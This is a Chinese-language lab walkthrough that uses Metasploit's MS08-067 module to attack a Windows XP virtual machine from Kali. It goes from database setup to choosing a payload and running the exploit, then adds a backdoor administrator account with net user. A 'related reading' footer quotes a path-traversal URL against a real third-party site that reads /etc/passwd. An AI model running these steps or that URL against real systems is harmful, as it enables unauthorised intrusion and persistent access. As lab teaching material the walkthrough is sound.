ms08-067
简单描述:ms08-067漏洞的全称为“windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
环境:一台kali虚拟机,地址为:192.168.123.128
windows xp虚拟机,地址为:192.168.123.100
2,:打开postgresql数据库:service postgresql start 或者 /etc/init.d/postgresql start
3,:切换到postgres数据库:su postgres,
3.1:创建用户:createuser username -P,输入自己设的密 码,username为用户名,自己随便起
3.2:创建数据库及其属组:createdb –owner=username database 第一个 username为刚刚创建的用户名,后面的database为创建的数据库名称,意为创建数据库database,其属组(主人)为username
4:进入MSF终端,输入:msfconsole
如今进不去的话,敲以下命令,然后多试试msfconsole
4:进入后查看数据库连接情况,输入:db_status,查看数据库状态下图表示未连接数据库
如果显示已连接但不是自己设置的数据库,
那么断开这个数据库连接,命令为:db_disconnect,然后再从新连接
5,搜索漏洞模块的名称和信息:search+漏洞名
6,使用该漏洞模块:use+模块名:
列出该漏洞模块下可以使用的中的载荷
4:设置一个windows的shell负荷,或者设置其他的负荷,在刚刚搜索漏洞的有效模块里面就可以看到其他的负荷,命令为:set + payloads +负荷名
5:设置目标的地址:
设置自己的地址:
6:显示靶机:show targets,
show targets
列出渗透攻击所有支持的目标平台。
可以选择一个目标,也可以不选,默认为所有的靶机都进行一次扫描:set target 1
7,选第一个目标平台进行攻击:
8:攻击目标输入:exploit
9:在windows的dos界面里面输入命令:
增加一个用户:net user +用户名+密码/add
net localgroup adMinistrators username /add 将username账户,给予管理员权限
10:(1),net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
(2),net user abcd /del,将用户名为abcd的用户删除。
(3),net user abcd /active:no,将用户名为abcd的用户禁用。
(4),net user abcd /active:yes,激活用户名为abcd的用户。
(5),net user abcd,查看用户名为abcd的用户的情况
相关阅读
一、 实验目的 掌握Nmap扫描器的安装与使用; 掌握Nmap进行远程OS检测的原理; 掌握Nessus在本机或远程控制,进行漏洞分析扫描; 掌握M
自2013年3月9日,《经济学人》杂志在其封面文章第一次详细描述了“共享经济”(The sharing Economy)的场景后。共享经济的模式已在深
PHP交流群:294088839, Python交流群:652376983 whois 域名/ip 查看域名的详细信息。 ping 域名/ip 测试本机到远端主机是否联通
某日组里小伙伴丢来一个链接:http://price.ziroom.com/?_p=../../../../../../../../etc/passwd%00.html说存在本地文件包含,木有上
1、查找ms08-067:2、使用:3、选择payload:(开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别)4、查看options(yes